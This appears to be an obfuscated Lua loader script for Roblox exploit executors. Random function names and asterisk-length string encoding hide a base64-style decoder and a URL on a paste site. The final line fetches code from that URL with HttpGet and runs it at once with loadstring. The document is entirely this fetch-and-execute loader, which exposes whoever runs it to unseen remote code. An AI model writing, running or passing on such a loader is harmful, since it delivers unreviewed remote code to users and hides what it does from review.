function XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local b=XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*****************************************************************','******************************************************************','*******************************************************************','********************************************************************','*********************************************************************','**********************************************************************','***********************************************************************','************************************************************************','*************************************************************************','**************************************************************************','***************************************************************************','****************************************************************************','*****************************************************************************','******************************************************************************','*******************************************************************************','********************************************************************************','*********************************************************************************','**********************************************************************************','***********************************************************************************','************************************************************************************','*************************************************************************************','**************************************************************************************','***************************************************************************************','****************************************************************************************','*****************************************************************************************','******************************************************************************************','*************************************************************************************************','**************************************************************************************************','***************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************','*******************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','**********************************************************************************************************','***********************************************************************************************************','************************************************************************************************************','*************************************************************************************************************','**************************************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','*****************************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************************','**********************************************************************************************************************','***********************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','**************************************************************************************************************************','************************************************','*************************************************','**************************************************','***************************************************','****************************************************','*****************************************************','******************************************************','*******************************************************','********************************************************','*********************************************************','*******************************************','***********************************************'})
function OzgOxTrGYnfnlzjMDMCpERRiHBtwRjYzLPAQrWXXGYldDazzXnacBIMrBdPuDoCkYvAVWkqHcwC(data) m=string.sub(data, 0, 55) data=data:gsub(m,XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({}))

data = string.gsub(data, XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*******************************************************************************************','**********************************************************************************************'})..b..XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*************************************************************','*********************************************************************************************'}), XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({})) return (data:gsub(XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'**********************************************'}), function(x) if (x == XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*************************************************************'})) then return XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({}) end local r,f=XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({}),(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*************************************************'}) or XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'************************************************'})) end return r; end):gsub(XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************','*************************************','****************************************************************************************************','***************************************************************'}), function(x) if (#x ~= 8) then return XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({}) end local c=0 for i=1,8 do c=c+(x:sub(i,i)==XXlKoIapziXNNqbhZjrQaZiVDacppbJdscGRxWLLnsmPXKZrwiQpAgodtVRHzBNSlPYHGMQhyCywHyiEhAsa({'*************************************************'}) and 2^(8-i) or 0) end return string.char(c) end)) end


 


function yiGgJzFLAQmNjLREuoEeSv(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


function SWBFDVJYSwRQiLTvHoyrsVpKNTJPojKBpLPXOtuCnKgZqm(code)res=yiGgJzFLAQmNjLREuoEeSv({})for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


loadstring(game:HttpGet(SWBFDVJYSwRQiLTvHoyrsVpKNTJPojKBpLPXOtuCnKgZqm({10920,12180,12180,11760,12075,6090,4935,4935,11760,10185,12075,12180,10605,10710,12705,4830,10185,11760,11760,4935,11025,12180,9135,9030,7980,6930,5250,8610,4935,11970,10185,12495}), true))();                
